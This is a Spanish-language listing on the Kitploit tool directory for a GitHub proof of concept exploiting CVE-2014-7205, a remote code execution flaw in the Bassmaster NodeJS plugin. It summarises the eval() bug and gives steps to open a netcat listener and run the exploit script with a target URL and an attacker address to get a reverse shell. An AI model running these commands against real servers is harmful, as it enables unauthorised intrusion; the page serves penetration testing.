Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2014-7205 — Bassmaster Plugin NodeJS RCE | Kitploit
Herramientas/GitHubGitHub/andrewtrube/cve-2014-7205
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónGeneración de Shellcode
GitHubandrewtrube/cve-2014-7205

CVE-2014-7205

Bassmaster Plugin NodeJS RCE

Ver Repositorio
4hace 4 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Bassmaster NodeJS Plugin RCE PoC

bassmaster-rce.py: Un script en Python para explotar CVE-2014-7205. nodeshell.py: Un módulo Python para generar una reverse shell para NodeJS

!!Úselo solo contra servidores en los que tenga permiso para realizar pruebas

Resumen

CVE-2014-7205 es una vulnerabilidad de Ejecución Remota de Código en el Plugin Bassmaster para NodeJS. Todas las versiones <= 1.5.1 están afectadas. La vulnerabilidad existe dentro del archivo lib/batch.js en la función internals.batch donde una llamada a eval() utiliza entrada de usuario escapada de forma incorrecta (básicamente, la expresión regular no verifica si las solicitudes contienen código malicioso).

Prueba de Concepto

  1. Descargue o clone el repositorio git
  2. Abra un listener de netcat en el terminal bash nc -lvp 4444
  3. Asegúrese de que bassmaster-rce.py y nodeshell.py estén en la misma carpeta
  4. Ejecute bassmaster-rce.py python3 bassmaster-rce.py -u http://target -p 8080 -l attacker.ip -P 4444

Otros

  • nodeshell.py es completamente portátil a otros PoCs y Exploits que usen Python y que también necesiten generar una reverse shell para NodeJS
Descargar herramienta